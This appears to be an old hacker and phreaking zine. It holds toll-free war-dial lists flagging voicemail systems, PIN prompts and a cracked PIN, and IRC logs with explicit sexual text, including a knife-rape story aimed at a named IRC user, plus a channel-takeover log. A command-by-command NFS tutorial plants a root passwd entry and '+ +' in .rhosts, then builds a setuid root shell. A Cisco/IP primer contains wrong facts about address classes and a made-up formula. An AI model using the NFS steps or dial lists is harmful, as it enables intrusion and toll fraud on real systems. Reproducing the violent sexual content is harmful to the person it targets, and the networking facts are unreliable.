#grhack #banana #b4b0 #darkcyde #bluebox (IRCnet) #hax (IRCnet). Special thanxx to the teams 9x b4b0 and d4rkcyde. By The Monty -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ o8oo scans ]::::::::[OO--[ by force ]---[ force007@hotmail.com ]::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ' the human toneloc ' ans...answerphone na....no answer rec...recording mm....meridian mail vmb...voice mail box o8oo 393ooo-3932oo --oOo------------- oo2 ans yorkshire electricity leaflet line oo3 na oo4 na oo6 rec the vodaphone you have called may be switched off oo7 vmb one attempt o1o gay rec 'cablecom...number 0ne on the phone' o11 same as above o12 ans o13 some call answering service o14 na o16 ans o17 na o18 na o19 carrier - +++ o2o vmb mm nortel networks euro resoursing o21 na o25 na o26 ans o28 ans o29 na o3o ans o33 vmb mm o34 vmb mm o35 na o36 ans o38 ans challenge hotline o42 pbx vmb mm meridian switch instalation centre o43 na o44 vmb mm resource control for city of london o45 na o46 vmb mm resource control for westminster o5o v [at 3am!] o53 na o55 na o56 na o57 ans o59 na o6o na o62 ans o63 na o65 v o67 na o69 na o7o ans noise hotline o72 ans o74 na o75 m - no response o76 ring then bubbly ring then fax o77 gay ans/vmb o78 fax o79 na o8o rings picks up hangs up o81 na o82 ans o84 water leakage line press *# enter id o87 m - no response o89 v o92 na o93 v transfered to security dept o94 na o95 ans o96 fax o97 ans o98 ans o99 v 1oo m - user access verification username: 1o4 ans 1o5 na 1o6 bt sorry the number is not available 1o7 na 1o8 v 1o9 na 11o v eclipse screen line 111 ans 112 ans 113 ans 114 bt sorry the number is not available 115 fax 116 fax 118 na 123 v 125 v 126 na 127 na 128 ans 129 m - 13o v something international 132 na 134 v hello? 135 na 136 na 137 v something cars [vodaphone] 14o rec 141 pabx copytakers mm switch [interesting] 142 short beep then nothing 143 v 146 v microspeakers 147 rec telecom eire # not in service 148 bt call minder 151 rings twice then hangs up 152 vmb mm bt phonecard sales 153 na 156 v 157 v 158 bt call minder 159 ans 16o ans 161 na 163 na 164 changed to o1454 618422 166 bt pabx [info on directory inquires and phone book sales] 168 bt sorry # not available 169 ans 17o vodaphone recall service for o7887 565862 172 bt sorry # not available 174 na 176 bt pabx [info on directory inquires and phone book sales] 177 na 178 forwarded to vms * security code 179 ans 18o fax 184 na 186 v bt faults 19o ans 192 na 197 vms english mm 198 pbx vms press * for user id 199 v super-rod 2oo rec compaq o8oo 132ooo-1322oo --oOo------------- oo1 company recording oo3 'this is the bt freephone portability test announcement' oo4 vmb oo5 ans oo6 crap ans sounded like he was underwater oo9 na o1o 'this service is currently unavailable' o12 b o15 'sorry this info line has closed' o16 na o18 company recording o22 v o23 na o25 v o26 na o27 na o29 na o3o weird beeps o31 fax o32 v o34 'the vodaphone you have called may be switched off' o35 fax o36 beeps on pickup then nothing o37 v someone *shouts* 'HELLO!' o38 ans beeps at keypresses o39 na o4O v 'dms message paging, only for emergancy pages, did you wish to page anybody?' o41 weird bubbly noise o42 na o45 vms audix o47 crap vmb/ans o48 fax o49 v o5O v o51 na o52 na o53 na o54 v midlands electricity o57 na o59 ans p=15 jrm painters and decorators o61 na o62 'this number is temp out of order' o63 ans brockland services o66 na o67 v greenflag glassline o68 na o69 fax o7o vms atlas copco press XXXX then # during the message o71 long beep then nothing press anything it beeps then hangs up o72 m/f won't connect o74 na o75 ans body and action press * for security code 2 digit o77 na o78 your session cannot be continued at this time please try later o79 fax o8o na o81 ans city of swansea public lighting section o82 ans owen mitchell press office o83 m - no response o84 v hellooooo...? o86 ans teleservices o87 fax o88 ans press # for security code o89 v blockbuster plumbing o9O ans virgin balloon flights o91 v rac fleet services o92 na o96 ans p=1234 youngs catering hotline o98 ans a woman called john!$#% o99 na 1oo na 1o1 na 1o3 v sibs cars 1o4 ans actionline 1o6 ans thompson and brian 1o7 ans kuwait helpline! 1o8 ans west midlands cleaning services 1o9 m - annex command line interpreter annex username: 111 v atm 112 na 115 v scotlands yule services 117 na 12o na 121 na 124 tone 125 ans 128 na 129 v monitoring centre 13o orange answering service for amatuer stock taking organisation 132 busy 136 changed to o1285 72o164 137 ans apex construction p=1 138 the number you have called is not currently in service call our helpline on o117 9767872 14o na 142 ans nick page insurance 143 na 144 m - sun mac glasgow - press ctrl-e 145 na 146 orange answering service for ferric removals 147 na 149 basic vms 151 na 153 vms welcome to batten press #* for user id 154 fax 155 v martian helpline sounded american or some strong accent 156 ans thanks for calling the network press # enter id 157 v eyetex 158 forwarded to fax 16o vms english mm 163 na 165 recording ppp healthcare press o to make it ring somewhere 166 na 167 v gp emergency centre 168 na 169 beeps on pickup then nothing hangs up after a few keypresses 17o na 175 na 176 na 177 vms audix bank of scotland 179 fax 18o vodaphone answering service for o385 3244o7 181 ans greenline driving school 183 v sarasons storm force 185 na 187 na 189 ans fisher and pike? 19o ans some college 191 vms message centre 192 recording ppp healthcare 194 ans 195 vms 196 na 198 na 199 ans 2oo na force... --oOo--- force007@hotmail.com uk vmb o8oo 919355 us vmb 18oo 331o17, 6, 4328 i'm clear in my mind but my soul is mad would you think it was funny if i stuck my dick in your ear? depends which ear -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ IRC logz ]:::::::::::::[OO--[ by j0O ]---[ ]:::::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::[ ]:::::::::::::::::::::::::::::::::: IRC LOGS -------- 1. force's fun in #gaychub 2. cyborg gets all erotic for op's 3. force begs cyborg for cybOr-he4d 4. cyborg and force talk about birthday cellebrations 5. force is obligated to fuck his girlfriend's mother 6. a few weeks later 7. zc2 and cyborg give a lesson on channel security 8. random irc qoutes collected by cyborg iRC logs --oOo--- * fORCE is now known as har0ld * har0ld has joined #gaychub hi hi, you like huge fat tits? yeah! you got huge fat tits? my tits stick out almost 3" from my chest, nipples 1 1/2" wide and 1/2" long when erect. tits big enough that I can grab one and put my nipple to my tongue wow! you have a pic? sorry, don't have any pics or scanner. so, what would you like to do with huge bear boobs like mine to get yourself off? i'd grab your tits and stretch them down past your waist, let em go and watch em both spring up in ya face then i'd spread nutella on them and lick it off so much that you bleed well, they can't reach quite that far. what's nutella? peanut butter shit maybe you'd like to suck and lick my huge mammaries, get them slick so your can boob fuck me maybe feel my huge hairy boobs, giant hard nipples running up and down the length of your long manmeat oh baby i'm getting hot nipples bigger than some guys' cockheads, rubbing and teasing your huge glans tit hair poking into your piss lips push my bear boobs together, wrapped around your huge dong in my hairy cleavage mmm feel the nest of hair in the valley between my boobs surrounding and caressing your cockhead do you have hairy bum clevage too? just a little. also have a big fat hairy navel eeewww get a life eat me eat my ass no you'd enjoy it FAG ...[cyborg gets all er0t1c for ops] <_Cyborg> ill pretend to read you a story about a beautiful grl who seduces you if u like <_Cyborg> but you must get me opped in return heh r34d t0 m3 <_Cyborg> agree to the deal first ok <_Cyborg> one day a hot chick had her car broke down i the middle of Basingstoke... <_Cyborg> she had nowhere to go but saw a house <_Cyborg> the house was lonesome looking, with a single occupant, a lonely person, a hax0r named force <_Cyborg> she knocked on the door, a hard firm knock this story had better be an 18 certificate or i'm taking it back <_Cyborg> *kn0ck* *kn0ck* <_Cyborg> it is <_Cyborg> its toatlly hardcore be patient <_Cyborg> im trying to build it up <_Cyborg> ----- haha ok rEaD 0n <_Cyborg> a guy answered the door, he was answered slowly "cum inside" <_Cyborg> she lifted her hair out of the rain and walked inside <_Cyborg> she rubbed her left breast slowly up and down taunting the lonesome phreak with her strides of sexual energy LOL <_Cyborg> force slammed the door, *hard* <_Cyborg> he typed his away msg and unhooked the phone... <_Cyborg> the grl put on music and a porn movie of old ppl fuckin hard <_Cyborg> he was nervous "would you like a towel?" he said <_Cyborg> he took the towel and licked it and then started to rub it along her pubic hairline amking gentle noises slowly... <_Cyborg> force was weak.. he jumped to the ground and screamed "i know i am not worthy, but give me mercy, show me a night of passion and i will be your slave!" <_Cyborg> but he was already a sexual slave.... <_Cyborg> she held him down.. he was too weak to stop her. <_Cyborg> she ripped off her top and the young force started to gnaw at her tits <_Cyborg> sucking harder!! <_Cyborg> she unziped his fly and oozed her tougne along her swelling cock <_Cyborg> up and down!!! <_Cyborg> up and down!!! <_Cyborg> up and down!!! <_Cyborg> she slid her bottoms to the ground and pushed force agianst the wall.... <_Cyborg> his hard dick, pushing, shoving, she was a fuck machine <_Cyborg> pain!! <_Cyborg> hard fuckin <_Cyborg> force felt many emotions, pain, pleasure, sadness, happiness, all at the same time <_Cyborg> unf <_Cyborg> uNf <_Cyborg> uNF <_Cyborg> unF! <_Cyborg> UNF! <_Cyborg> UNF!! <_Cyborg> ahhhhhhhh, she screamed <_Cyborg> "stop it force" she begged <_Cyborg> "stop fuckin me wild you eltie bastard!" she wailed <_Cyborg> but he wouldnt stop <_Cyborg> the pain added to the please <_Cyborg> pleasure <_Cyborg> UNF!!! UNF!!! OHHHHH!! AHHH! YEAH BABY!!! *BABY*!!! BABBBBYYYY!!!! ...[once again cyborg wants ops, evas1ve was someone on irc trying to get z0mba's, force's and darkcyde's in general d0cs] <[cyborg]> It was saturday, force and zomba were in blackpool at dns con... <[cyborg]> zomba said "i have to go to the toilet" and left <[cyborg]> force wa all alone when a strong buxom woman sat where she had been.... <[cyborg]> she was innocent, with pretty, tight tits and a virgin smile but their was something about her.. <[cyborg]> she introduced herself.. "im evas1ve, who are you?" <[cyborg]> force was intriguded to see that evas1ve was a young sexy girl who truned him on.... <[cyborg]> force said "eh.. um.. my name is Matt, do you wanna fuck?" <[cyborg]> the question didn't startle her, she breathed hevily and stuck her tougne out licking her finger slowly <[cyborg]> force led her to an unknown warehouse <[cyborg]> he pointed to a chair.. she sat on it <[cyborg]> he strted to tie her up, *hard knots gripping her skin* <[cyborg]> he pressed his lips against her breasts and started to undo his pants.. <[cyborg]> when he undid his pants a knife fell out... Y-FRONTS! <[cyborg]> "ahhhhh" she screamed <[cyborg]> "a kn1f3!!!" she struggled to get away she was really running from the pebble-dashed y-fronts <[cyborg]> force said "i am force and i have been wanting to fuck you with this blade ever since i heard about you" <[cyborg]> he took the blade... <[cyborg]> and said how he was going to shove it up her cunt.. <[cyborg]> fuck it hard <[cyborg]> *fuck it hard* <[cyborg]> *FUCK IT HARD* <[cyborg]> FUCK THE BLADE!! <[cyborg]> blood, screaming, panic, hardc0re knife fuck!!! <[cyborg]> zomba came reeling through the door, "wtf?" he screamed <[cyborg]> force threww the knife to the ground <[cyborg]> it fell with a *bang* <[cyborg]> he pulled her clothes off, <[cyborg]> she was crying, bloodsoaked, naked!! <[cyborg]> force said "zomba: this is that evas1ve chick and we are gonna rub himlit and cum in her ear and buttfuck her" <[cyborg]> so force and zomba took turns rapng her!! <[cyborg]> yeah baby <[cyborg]> *yeah baby* <[cyborg]> *YEAH BABY* <[cyborg]> *YEAAHH BAABBBYYY* <[cyborg]> IM FUCKING THE FBI!!! OHHHH!! BITING FBI TIT!!! AHHHHA!! ...[force begs cyborg for cyber head] <_Cyborg> i will give you siber secks <_Cyborg> anything you want heh i want cYb0r h34d innit * _Cyborg grits his teeth and licks his lips... <_Cyborg> here goes ok... <_Cyborg> heh <_Cyborg> not really though, that would be sick heh you pussy g1bb0r m3 h34d!!! ...[cyborg and force talk about birthday celebrations and people who seek attention on their birthday] *** [cyborg] changes topic to 'http://www.ecad.org/up/' <[cyborg]> his 18th birthday was another fuckin a-s propaganda coup <[cyborg]> getting people to send him cards sheesh! <[cyborg]> h0h hey! i'm 17 tommorow EVERYONE SEND ME CARDS!!! <[cyborg]> heh <[cyborg]> imagine people's reaction if you put that in the f4ith <[cyborg]> everyonw would be like 'wtf is this?' heh they'd say 'shit on me, he must be ereet!' ...[force is obligated to fuck his girlfriend's mother] you wank i have a girlfriend to do that stuff for me oh yeah, and what do you do when your girlfriend is out of town? fuck her mom ... a few weeks later ... well today is my birthday and its been the worst of my life and my girlfriend is STILL ON HoLiDaY!#$% <_Cyborg> fux0r h3r m0mma erm n0 <_Cyborg> heh <_Cyborg> but you said you would no i didnt ...[zc2 and cyborg give a lesson on channel security] This log is a meant as a guide to people who don't want their channels taken over. We will go over all the mistakes Flacid made. Cyborg and Zc2 did a takeover of #U2_4_Ever. Then minutes later they did another takeover of #U2_Rulez. [1] His first mistake. *** Flacid sets mode: +o Zc2 [2] This guy is just fucking dumb. *** Flacid sets mode: +o Cyborg [3] If you want to keep a channel, load a bot in. *** Quits: Flacid (Excess Flood) *** Joins: Flacid (Flacid@1Cust107.tnt9.minneapolis.mn.da.uu.net) hey op me guyz no heh *** Zc2 sets mode: -o Cyborg *** Zc2 sets mode: +ik tAKeoVeR *** Zc2 changes topic to 'tHiS cHaN iS noW RuN bY Zc2' hehe [4] No amount of arguing will help. i will toast you i swear op me or die heh sweet takeover no *** Zc2 sets mode: +o Cyborg h0h [5] Don't make threats you can't keep. do u wanna get g-lined it dont even have a bot yea. G-line me Flacid: i am waiting for the G-LINE G-L1NE US F00l [6] Be more careful in future. At this point Cyborg changed his nick and ident but left his IP the same becuase he was too lazy and Flacid was too stupid. He came in as J0E. can i have ops? *** Quits: Riffs (Leaving) u can hav ops joe me># ? thank you me? if you promise not to op him ok i promise can i have ops? can i have ops? *** Flacid sets mode: +o J0E hehe *** J0E sets mode: -o Flacid lol LOL *** J0E is now known as Cyborg___ LOL loser op me *** Cyborg___ sets mode: +o Zc2 loser hehe ok i m fuckin pissed off Flacid: you are the dumbest fuckin shit i ever saw we just 0wned both your channels [22:17] think im that stupid [22:17] think im that stupid [22:17] think im that stupid ...[random irc qoutes collected by cyborg] big pants are the devil's creation. whats the port master? holybob : the dude who makes sure boats dont clog his port yeah and you sit in it cuz you don't know how to use a bathroom you filthy pig fucking nut sucker.. the lord blessed him with a 15" penis so he can fuck him self in the ass stupid h0m0s3xu4l bots why the fuck is this so boring there are people in this channel do something has anyone got a war dialler to use in UK whats wrong with mIRC? I'm talking to the asshole Cyborg Cyborg prepare to be port-phucked. willo <---------- cl00bag ##!$^@ willo <---------- cl00bag ##!$^@ willo <---------- cl00bag ##!$^@ cyborg is gay op me op me h2so4 he wont op u and if he does hes stupid *** h2so4 sets mode: +o teehee *** teehee sets mode: +b *!*@usr195-kno.cableinet.co.uk *** willo was kicked by Optix (Banned) <^Silicon-Trip^> we like to keep it close and tight -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ NFS ]::::::::::::::::::[OO--[ by msinister ]---[ ]:::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::[ ]::::::::::::::::::::::::::::::::::: NFS or network file system is a remote file system/directory , that is mounted from a remote unix host. the file system changes and data are saved and retreived from the remote host. What is it for and where is it used ? it is for computers, who do not want enough space for a /usr/bin directory, which is usually just binaries. and run more than one computer. How are the directories mounted ? man mount / man showmount / man rpc.mountd. or use this short explaination. "showmount -e host" shows you the directories that can be mounted and which hosts are allowed. example: export list for x: /usr program /tmpusers1 math /var/spool/mail (everyone can mount this) you can also use "showmount -a host" to see which hosts are currently mounting directories/FS's from the host. example: y.x:/tmpusers z:/tmpusers1/bla t:/tmp t:/usr t:/local t:/tmpusers2 How do I abuse this ? first I'll discuss non-suid shit, which is definitely harder to crack. Non-suid nfs means root has no access on the remote system for read/write, he is like a regular, and where he has write access, it will usually pop out to be nobody, and not root. But if it aint suid ? well you can try to hack in the following steps. try to mount a user directory, something like /home: mount -t nfs wisdom:/home /tmp/mnt now try to look in the directory for users, you can usually tell a user directory for having files like .cshrc or .bashrc, etc. now that you've found a user directory, lets say /home/baby go into /home and type ls -l | grep buffy you will now know the user id of the user most probably. Now if the NFS is writeable all we need to do is to put a "+ +" line in the users .rhosts, and we can t/o. but we have no access as root. lets use the uid we got before echo a::uid:0::/:/bin/sh >> /etc/passwd" now su a, we can write now lets "echo + + >> .rhosts". now lets rlogin wisdom -l baby, it shouldnt ask us for a password, we're in. We are in. we can now try to locally exploit the server. So whats the big deal, about suid-nfs ? ah, now, if we had suid nfs. we'd probably have to just about the same thing but, say you followed the same steps, and entered the machine you can now echo "main(){setuid(0);setgid(0);system("/bin/sh");}" > ahm.c now go into the shell u got using the rlogin. type "gcc -o ahm ahm.c" we're not done yet. now we logout, go to our mounted directory, and do: chown root ./ahm chmod 4755 ./ahm Now we shall have our root. Log once again into the shell and type ./ahm (dont forget the "./" else it wouldnt work ) # id uid=0(root) gid=0(root) groups=0(root) nice heh? see ya! -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ 1-800-454-22XX ]::::::[OO--[ by anon ]--[ ]::::::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 1-800-454-22xx 00 - [Fiber Optic Design company] 01 - [Not avail. from calling area] 02 - [dead] 03 - [Not avail. from calling area] 04 - [at&t easy reach 800] 05 - [registration office .. mumble mumble] 06 - [at&t easy reach 800] 07 - [dead] 08 - [party trying to call doesn't accept calls from an anonymous number] 09 - [Not avail. from calling area] 10 - [at&t easy reach 800] 11 - [San Francis pub???] 12 - [Not avail. from calling area or dead] 13 - [dead] 14 - [United London ??] 15 - ["Hello this is Shelia speaking, can i help you?" yeah, do u give good head?] 16 - [Brick wires??] 17 - [Please enter your four digit pin cracked: 9999 :) frontier customer service] 18 - [Not avail. from calling area] 19 - [invalid or blocked from my area code] 20 - ["You have reached a non working toll free number" <-- sounds horny :>] 21 - [busy] 22 - [dead] 23 - ["Hi baby want me to get you hot?" sex line] 24 - [carrier] 25 - [dead] 26 - [mohawk industries Florida] 27 - ["Customer service, this is Jennifer"] 28 - [dead] 29 - [doesn't ring, sits there doing nothing] 30 - [dead] 31 - [dead] 32 - [at&t easy reach 800] 33 - [grafix systems company] 34 - [please enter your four digit pin, prolly frontier again 9999?] 35 - [plays weird tones loud, ear aches... fuck faces.. then goes dead] 36 - [doesn't ring, sits there doing nothing] 37 - ["B A C planes how can i help you"] 38 - ["Matthis and testry" ?? some lady] 39 - [US Health Care] 40 - [Not in service or can't be reached from my calling area] 41 - [Spar tech glasses ??] 42 - [dead] 43 - [Not in service or can't be reached from my calling area] 44 - [dead] 45 - [fax, ugh] 46 - [bear state chemical refridgeration department] 47 - [dead] 48 - [pager] 49 - [Search USA] 50 - [midlands financial group ??] 51 - [pager] 52 - [Welcome to statlanders pharmacy] 53 - [a bakery :)] 54 - [dead] 55 - [couldn't understand the hoe] 56 - [at&t easy reach 800] 57 - [couldn't understand her either] 58 - ["Good afternoon ?takkedda?] 59 - [at&t easy reach 800] 60 - [Parkview apartments] 61 - [some guy "Hello"] 62 - [fast busy signal] 63 - [rings a few times then goes dead] 64 - [Praise the Lord Gospel ?] 65 - [Scripts Bank] 66 - [?? Joe speaking] 67 - [endless ring] 68 - [dead] 69 - [dead] 70 - [endless ring] 71 - [busy] 72 - [something athletes] 73 - ["Good morning California Saints"] 74 - [invalid or blocked from my area code] 75 - [some dork.. tells his phone number and asks if you want to talk to him] 76 - [Critter corral??] 77 - [fax, ugh] 78 - [fast busy] 79 - [dead] 80 - [the parts department ?] 81 - [trall shobby international services] 82 - [Illinois community college association] 83 - [dead] 84 - [American Kids something or other] 85 - [endless ring] 86 - [farmers insurance] 87 - [800.communications ??] 88 - [dead] 89 - ["Please enter your four digit pin" 9999 frontier thing i think AGAIN] 90 - [Tripple A] 91 - [Directors Hotline update] 92 - [endless ring] 93 - [Mary kay service center] 94 - ["Please enter your four digit pin" 9999 frontier thing i think AGAIN] 95 - [busy] 96 - [some help place] 97 - [tone, number controlled by 'ideas' or something, interesting check it] 98 - [dialed invalid location] 99 - [can't understand] -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Cisco Router IP config ]::[OO--[ by wiz ]--[ wiz@blackcode.com ]::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: o0|w1z Tech Production|0o |Configuring and Running routers -Cisco-| |with some introduction about IP addressing| By: w1z Email: w1z@blackcode.com ========================================================= What is a router? What is meant by IP? How packets are transferred? How your ISP Assigns an IP for you? Do you really know about these issues in details not basically? If yes then you don't need to read this article and waste your time since you know all About this. But my advice is to read this again to jog your memory and for other useful Reasons say that I have more information that you don't know, or that there are some Sections that were hard for you to understand you can read them here in plain English. Here, I will give the information about the above sections in details, not too Deep but enough to make you understand how things work. I see a lot of people who call Themselves hackers/crackers/0wn3rz/13373rz/etc. who don't know a SHIT of how the things They use work; thus they will not use them as efficiently as possible. Understanding How the Internet Protocol worx is very interesting and amazing (did u know that when Assigning an IP there is a simple formula used? No shit. I think it is x-y^x=2, or Something like that but I don't remember.). *Daily* I hear some people saying this Shit: " hey lamer ill packet you till you die motherfucker@#@#$#@ " or "ph33r my packets" Or " if you repeat that again I swear I will icmp your ass" etc. didnt you hear these Phrases? I bet that they don't know what's the meaning of a packet or ICMP. If u ask them what Is ICMP, directly you will get this answer "Internet Control Message Protocol", I fucking Know this but what does "Internet Control Message Protocol" mean, he will answer back It means "Internet Control Message Protocol" if you don't like it fuck off. My aim in this article is to show the way for hackers/computer geeks/People who want to learn/admins/security fans the right way for understanding some topics In the networking/Internet realm. Since I have some knowledge in these issues why Shouldn't I share it . What I will discuss in this article is the following: . I will put most of my effort in the routers section since this article basically was To be about routers but I included some topics so you can understand better. For any comments/suggestions/remarks drop me a mail on w1z@blackcode.com. I hope you will get the most of this article ... now lemie start and not waste time! [Routers] Ok, you have to know some basic uses of routers, and they are listed below: *Connects two networks (LAN-to-LAN). *They restrict other networks/individual access to a networks (basic access list). Routers are very important for big networx and they are relatively expensive ;) . When you want to setup a router for a certain network you will hafta configure it first, This is the base of the router. Configuring can be from many external sources, For example through a console port, this means a PC is connected to the router trough A console hole at the back of the router. And a good thing is that you can get the Configuration data from an FTP server in the network and compile it there. Also other Terminals (w/s) from the network can configure the router. The router has a very Fucked up complex mother fucking hard internal designed, no doubt it is expensive. Inside *ironically* the router there are some architecture that is complex. We have < RAM - NVRAM - FLAH MEMORY - ROM - CONSOLE - AUXILIARY - INTERFACES > inside a router. All of you know what is RAM and ROM (if you don't then don't continue reading pls.) but what ARE NVRAM, FALSH MEMORY, CONSOLE, AND AUXILIARY? Ok NVRAM means Non-Volatile RAM. This Simply contains a backup copy of your configurations, FLASH MEMORY is like memory card is Sony play station :p ... it is a slot behind the router where the flash card is Inserted, it is a special kind of erasable programmable read only memory and contains A copy of Cisco IOS (in Cisco routers (IOS (Internetwork Operating system))). The CONSOLE and AUXILIARY are for the configurations ... where the a PC is connected to the console hole and An auxiliary connected in the AUXILIARY hole. Lemmie mention the algorithm that is used For the sartup ... hmmmm. Ok, when the router first starts it will look for the Configuration file, if found where should it be loaded from the FTP server or the FLASH MEMORY, if it didn't find a configuration file it will be default enter the Setup mode. Now comes the hard part, you want to configure the router and assign an IP for it, masks, subz, etc ... you will be prompted to enter each, after you finish Configuring everything would be ready. Shit I forgot to mention above that the Configuration file is very vital for the router; it is like the brain that's why we have NVRAM in the router. The hard thing for most people if configuration is the IP settings. There is a section for IP addressing after the router section. Now let discuss the commands used for configuring/running the router. When you are First connected to the router and the configuration file is configured and sat you will be Prompted by a line asking for a password to get access for the router. User Access Verification Password: W1ztech_router> In this case I wont be a privileged user, so if I want to enter the privilege mode I should Type "enable". It will then ask for another password. U enter it and you will be A privileged user. Notice that in UNIX systems they use % or $ for the normal user While here they use > ... and in UNIX the root # and it is the same for Cisco router (This isn't important). If you are a newbie you can browse the list of commands by typing "?" and for example you needed help if the config command u type "config ?". To see the other things in the router like the interfaces, pppz, slipz, IPz, access lists,etc.. you should type sh and the things you want to see, sh stands for show u can also use show. say for example you want to see the interfaces so you will type "sh interfaces". say you want to change the hostname of the router ... lets take this example : w1ztech_router# <---- should be # so you can change the hostname ... type config press enter, then type terminal and press enter ... you will see this : w1ztech_router(config)# now type hostname and and press space then the name of the hostname...w1ztech_router(config) #hostname w1z then when you press enter u will see this : w1z(config)# now hold ctrl and press z to get out of config. Hopefully in the next a next article I will continue to go in more details for the Commands and setting, for now it is fine for you if you practice and get help by the "?" command. you can telnet to a router and use it, u can telnet then from the router to another host and etc .... here is a list of commands for a Cisco router: Access-enable Create a temporary Access-List entry Access-template Create a temporary Access-List entry bfe For manual emergency modes setting clear Reset functions clock Manage the system clock configure Enter configuration mode connect Open a terminal connection copy Copy configuration or image data debug Debugging functions (see also 'undebug') disable Turn off privileged commands disconnect Disconnect an existing network connection enable Turn on privileged commands erase Erase flash or configuration memory exit Exit from the EXEC help Description of the interactive help system lock Lock the terminal login Log in as a particular user logout Exit from the EXEC name-connection Name an existing network connection no Disable debugging functions pad Open a X.29 PAD connection ping Send echo messages ppp Start IETF Point-to-Point Protocol (PPP) reload Halt and perform a cold restart resume Resume an active network connection rlogin Open an rlogin connection rsh Execute a remote command send Send a message to other tty lines setup Run the SETUP command facility show Show running system information slip Start Serial-line IP (SLIP) start-chat Start a chat-script on a line systat Display information about terminal lines telnet Open a telnet connection terminal Set terminal line parameters test Test subsystems, memory, and interfaces traceroute Trace route to destination tunnel Open a tunnel connection undebug Disable debugging functions (see also 'debug') verify Verify checksum of a Flash file where List active connections write Write running configuration to memory, network, or terminal x3 Set X.3 parameters on PAD ============================================================================= [Introduction IP Addressing] What is an IP ? Internet protocol. Network layer protocol in the TCP/IP stack. IP in general provides features for addressing. An IP address is a 32-digit assigned to hosts using TCP/IP. An IP could be from class A,B,C,D,E. Written in this format zzz.zzz.zzz.zzz . Each address has a network number, a subnet number, and a host number. The network and subnetwork number are used for routing. A subnet mask is used to get out more network and subnetwork information from the IP address. Class A 1 -> 126 Class B 128 -> 191 Class C 193 -> 223 Class D Class E Class A -> xxx.yyy.yy.y Class B -> xxx.xxx.yy.y Class C -> xxx.xxx.xx.y Class D -> xxx.xxx.xx.x Class E notice in class B it started from 128 and not 127, why? because 127.0.0.1 is used for loopback test. check this algorithm : xxxx xxxx x<-128 x<-64 x<-32 <-16 x<-8 x<-4 x<-2 x<-1 how did I get this ? get your calculator and pay attention. ok first we have 1, 1*2=2, 2*2=4, 4*2=8, 8*2=16, 16*2=32, 32*2=64, 64*2=128. We use this for assigning IPz. Did u ever see a kind of this IP:298.xxx.xxx.xxx ?? NO .. WHY ? take the maximun class which is D and add the first four xxxxs ... 128+64+32+ 16 = 255 . 255.xxx.xxx.xxx is the maximum that you will ever see . DHCP : Dynamic host configuration protocol server . instead of assingning IPs manually this will generate the IPs. for resolving IP addresses we use netBIOS. I think this is what you need to know for an introduction about IP addressing. --- w1z -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ O8OO scan ]:::::::::::::::[OO--[ by trionix ]--[ ]:::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 0800 393 *** 500-999 by Trionix ]|[-0800-393-500-]|[ dead ]|[-0800-393-501-]|[ gas and coal services ]|[-0800-393-502-]|[ dead ]|[-0800-393-503-]|[ voice ]|[-0800-393-504-]|[ not recognised ]|[-0800-393-505-]|[ dead ]|[-0800-393-506-]|[ answerfone (medical) ]|[-0800-393-507-]|[ dead ]|[-0800-393-508-]|[ not answered ]|[-0800-393-509-]|[ dead ]|[-0800-393-510-]|[ dead ]|[-0800-393-511-]|[ press #, please enter security code ]|[-0800-393-512-]|[ not recognised ]|[-0800-393-513-]|[ dead ]|[-0800-393-514-]|[ voice ]|[-0800-393-515-]|[ norditrophan link line, press 1, *, please enter your password (4 digits) ]|[-0800-393-516-]|[ BT muffled answering service ]|[-0800-393-517-]|[ dead ]|[-0800-393-518-]|[ not answered ]|[-0800-393-519-]|[ not answered, maybe linked to 518 ]|[-0800-393-520-]|[ tax keen info line, oh joy oh rapture ]|[-0800-393-521-]|[ electrician answerfone ]|[-0800-393-522-]|[ financial services, # transfers to op ]|[-0800-393-523-]|[ press #, please enter security code ]|[-0800-393-524-]|[ dead ]|[-0800-393-525-]|[ dead ]|[-0800-393-526-]|[ loud ring, msging service, press *, please enter your password (4 digits) ]|[-0800-393-527-]|[ dead ]|[-0800-393-528-]|[ not answered ]|[-0800-393-529-]|[ dead ]|[-0800-393-530-]|[ dead ]|[-0800-393-531-]|[ dead ]|[-0800-393-532-]|[ not recognised ]|[-0800-393-533-]|[ dead ]|[-0800-393-534-]|[ not answered ]|[-0800-393-535-]|[ dead ]|[-0800-393-536-]|[ voice ]|[-0800-393-537-]|[ dead ]|[-0800-393-538-]|[ dead ]|[-0800-393-539-]|[ dead ]|[-0800-393-540-]|[ dead ]|[-0800-393-541-]|[ !!!modem/fax!!! (probably fax) ]|[-0800-393-542-]|[ Legal and General redirecting me ]|[-0800-393-543-]|[ not recognised ]|[-0800-393-544-]|[ answerfone ]|[-0800-393-545-]|[ FUCKING LOUD "HELLO" ]|[-0800-393-546-]|[ answerfone ]|[-0800-393-547-]|[ dead ]|[-0800-393-548-]|[ pause, then dead ]|[-0800-393-549-]|[ pause, then dead ]|[-0800-393-550-]|[ dead ]|[-0800-393-551-]|[ dead ]|[-0800-393-552-]|[ dead ]|[-0800-393-553-]|[ diesel line tel. answering system ]|[-0800-393-554-]|[ dead ]|[-0800-393-555-]|[ dead ]|[-0800-393-556-]|[ not available ]|[-0800-393-557-]|[ dead ]|[-0800-393-558-]|[ no-one available to take call ]|[-0800-393-559-]|[ energy management centre answerfone ]|[-0800-393-560-]|[ voice, British Airways ]|[-0800-393-561-]|[ VMS, social services complaints unit ]|[-0800-393-562-]|[ dead ]|[-0800-393-563-]|[ dead ]|[-0800-393-564-]|[ not answered ]|[-0800-393-565-]|[ not answered ]|[-0800-393-566-]|[ not answered ]|[-0800-393-567-]|[ engaged ]|[-0800-393-568-]|[ not answered ]|[-0800-393-569-]|[ summat flora 